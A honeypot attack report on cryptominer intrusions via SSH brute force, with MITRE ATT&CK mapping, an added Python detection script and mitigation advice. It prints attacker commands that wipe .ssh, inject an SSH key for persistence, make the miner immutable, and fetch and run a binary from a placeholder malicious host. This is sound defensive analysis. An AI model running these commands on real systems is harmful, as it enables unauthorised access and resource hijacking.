Attack Observation Report: Analysis of Cryptominer Activity

Executive Summary

This report examines the crypto miner activity detected on the Digital Ocean based [1]DShield honeypot, breaking down the attackers' attack patterns, techniques, and payloads. This analysis also maps relevant [2]MITRE ATT&CK techniques, providing a clear view of the adversaries' strategies.

1. Overview of Cryptominer Activity

  • Total Attacks Involving Cryptominers: 8 distinct sessions
  • Key Payloads:
    • miner.r002c0dgm24/xmrig (ELF binaries for various architectures)
    • miner.yknqn (Used for persistent cryptocurrency mining)
    • setup.sh and clean.sh (Scripts for deploying and hiding the miner)

2. Attack Vectors and Techniques

Attackers used SSH brute-force attacks to break into the honeypot, exploiting weak or common passwords. Once inside, they quickly moved to install crypto mining software, which hijacks the server's CPU resources to mine cryptocurrency. Below, we break down the stages of the attack, aligning them with MITRE ATT&CK techniques where relevant.

2.1. Initial Access (ATT&CK T1078: Valid Accounts)

The attackers primarily accessed the server by brute-forcing SSH, targeting weak or default passwords with automated SSH attacks, where attackers rotate through a list of known username-password pairs. This highlights the critical need for strong password policies and securing SSH services.

  • Example Credentials Used:
    • root:abcd1234@
    • opc:opc
    • wp-user:123

2.2. Execution (ATT&CK T1059.004: Command and Scripting Interpreter: Unix Shell)

After gaining access, the attackers ran several commands to prepare the environment for crypto mining. This included disabling security measures, removing competing processes, and setting up the system for long-term exploitation.

  • Key Commands:
    • cd ~; chattr -ia .ssh; lockr -ia .ssh – Strips the immutable (i) and append-only (a) attributes from .ssh so the directory can be modified; lockr is a non-standard utility invoked alongside chattr for the same purpose.
    • rm -rf .ssh && mkdir .ssh – Deletes and recreates .ssh, wiping any existing authorized keys before the attacker's own key is added.

2.3. Persistence (ATT&CK T1098: Account Manipulation)

The attackers modified SSH configurations to maintain control, particularly the .ssh/authorized_keys file, ensuring they could regain access even if the root password was changed.

  • Key Commands:
    • echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvc">>.ssh/authorized_keys && chmod -R go= ~/.ssh – Adds the attacker's SSH key to ensure persistent access.

2.4. Defense Evasion (ATT&CK T1222: File and Directory Permissions Modification)

To avoid detection and make removal difficult, the attackers used chattr to make critical files immutable.

  • Key Commands:
    • chattr +i /tmp/miner – Makes the miner binary immutable, preventing it from being deleted or modified.

2.5. Impact (ATT&CK T1496: Resource Hijacking)

The primary consequence of these attacks was resource hijacking. The crypto miners consumed significant CPU resources, which degraded legitimate services' performance and potentially raised operational costs.

  • Key Commands:
    • nohup /tmp/miner & – Runs the miner in the background, continuously using CPU resources for cryptocurrency mining.
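The stage breakdown above expressed as detection logic over honeypot command events, added here as an example and not part of the original report: it assumes Cowrie-style JSON events (eventid, username, password, input fields), and the session, host name and key string embedded below are constructed.

```python
"""Added example (not from the report): map Cowrie-style SSH honeypot events
to the ATT&CK stages above. Log lines, host and key below are constructed."""
import json
import re

# (ATT&CK ID, stage label, pattern over the raw command line as logged)
RULES = [
    ("T1059.004", "Execution: unlock/reset .ssh and fetch payload",
     re.compile(r"chattr -ia \.ssh|lockr -ia \.ssh|rm -rf \.ssh|wget\b.*-O\s+/tmp/")),
    ("T1098", "Persistence: append key to authorized_keys",
     re.compile(r">>\s*\.ssh/authorized_keys")),
    ("T1222", "Defense evasion: make payload immutable",
     re.compile(r"chattr \+i \S+")),
    ("T1496", "Impact: launch miner in the background",
     re.compile(r"\bnohup\s+\S+\s+&")),
]
# Key material echoed into authorized_keys, captured for allowlist comparison
KEY_RE = re.compile(r'"(ssh-(?:rsa|ed25519) [A-Za-z0-9+/=]+)')
# Constructed session replaying the command sequence from section 2
SAMPLE_LOG = r"""
{"eventid":"cowrie.login.success","session":"s1","username":"root","password":"abcd1234@"}
{"eventid":"cowrie.command.input","session":"s1","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh"}
{"eventid":"cowrie.command.input","session":"s1","input":"rm -rf .ssh && mkdir .ssh"}
{"eventid":"cowrie.command.input","session":"s1","input":"echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABEXAMPLEKEY0000\">>.ssh/authorized_keys && chmod -R go= ~/.ssh"}
{"eventid":"cowrie.command.input","session":"s1","input":"wget http://payload.invalid/redtail.x86_64 -O /tmp/miner && chmod +x /tmp/miner"}
{"eventid":"cowrie.command.input","session":"s1","input":"chattr +i /tmp/miner"}
{"eventid":"cowrie.command.input","session":"s1","input":"nohup /tmp/miner &"}
"""

def classify_session(log_text):
    """Return credentials used, technique ID -> matching commands, injected keys."""
    report = {"credentials": None, "techniques": {}, "injected_keys": []}
    for line in filter(str.strip, log_text.splitlines()):
        ev = json.loads(line)
        if ev.get("eventid") == "cowrie.login.success":
            report["credentials"] = f'{ev["username"]}:{ev["password"]}'
            report["techniques"].setdefault("T1078", []).append("ssh login")
        elif ev.get("eventid") == "cowrie.command.input":
            cmd = ev["input"]
            for tid, _label, rx in RULES:
                if rx.search(cmd):
                    report["techniques"].setdefault(tid, []).append(cmd)
            report["injected_keys"].extend(KEY_RE.findall(cmd))
    return report

def stage_labels(report):
    """Observed stages, in the order they were first seen in the session."""
    names = {tid: label for tid, label, _ in RULES}
    names["T1078"] = "Initial access: valid account via password"
    return [f"{tid} {names[tid]}" for tid in report["techniques"]]
```

Feeding a real Cowrie cowrie.json into classify_session gives, per session, the credentials used, the technique IDs hit and any key text that was appended, which can be diffed against an allowlist of expected keys.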

3. Detailed Analysis of Cryptominer Payloads

3.1. Miner redtail.arm7

  • SHA-256 Hash: [3]66354c8878ca935f0fc6e3623e190e8a400318ded4c8d3d7baa85873059bc179
  • Description:
    • This ELF binary targets ARMv7 architectures, meaning it can exploit a wide range of devices, from tiny IoT gadgets to cloud servers.
    • The miner connects to a mining pool, contributing hash power to mine cryptocurrency, typically Monero (XMR).

3.2. Miner redtail.x86_64

  • SHA-256 Hash: [4]17229e1940e272030b079915600ea9fd944b8250680d89e1ee1eca42bbe3772f
  • Description:
    • Designed for 64-bit x86 architectures, this miner is ideal for exploiting cloud servers and high-performance systems.
    • Deploying architecture-specific binaries shows the attackers' focus on maximizing resource exploitation.

3.3. Associated Shell Scripts

  • Setup and Clean-Up Scripts:
    • [5]setup.sh and [6]clean.sh scripts were used to deploy and hide the miner binaries effectively. These scripts automate the system preparation, disable security features, and ensure persistence.

Example Command:

wget http://<malicious domain>/redtail.x86_64 -O /tmp/miner && chmod +x /tmp/miner && /tmp/miner

4. MITRE ATT&CK Mapping

The tactics and techniques observed in this crypto miner campaign can be mapped to the following MITRE ATT&CK techniques:

  • Initial Access: T1078 - Valid Accounts
  • Execution: T1059.004 - Command and Scripting Interpreter: Unix Shell
  • Persistence: T1098 - Account Manipulation
  • Defense Evasion: T1222 - File and Directory Permissions Modification
  • Impact: T1496 - Resource Hijacking

5. Impact Assessment

Resource Utilization:

  • The crypto miners significantly increased CPU usage, leading to degraded system performance. This could mean higher costs in cloud environments due to increased resource consumption.

Operational Costs:

  • Continuous mining could result in unexpected financial costs for the victim, especially in cloud environments where resource usage is billed based on consumption.

System Stability:

  • Crypto miners could destabilize the system by consuming resources needed by legitimate applications, potentially causing downtime or degraded service availability.

Persistence and Evasion:

  • The use of file immutability (chattr +i) and automated deployment scripts (setup.sh) reflects a sophisticated approach to maintaining persistence and evading detection, making incident response more challenging.

6. Recommendations for Mitigation

  • Strengthen SSH Security:
    • Enforce strong, unique passwords and disable password-based authentication in favor of SSH keys.
    • Implement Multi-Factor Authentication (MFA) to add an extra layer of security to SSH access.
  • Network and System Monitoring:
    • Deploy network-based intrusion detection systems (NIDS) to monitor outbound traffic for connections to known mining pools or suspicious IP addresses.
    • Monitor CPU usage for unusual spikes, which could indicate crypto miner activity.

Conclusion

The detected crypto miner activity illustrates the ongoing threat of resource hijacking in cloud environments. Attackers exploited weak SSH credentials to gain access, deployed customized crypto miner payloads, and implemented persistence measures to avoid detection. These attacks can lead to significant financial and operational impacts, including higher costs and reduced system performance.

References

[1] DShield Honeypot

[2] MITRE ATT&CK

[3] redtail.arm7

[4] redtail.x86_64

[5] setup.sh

[6] clean.sh
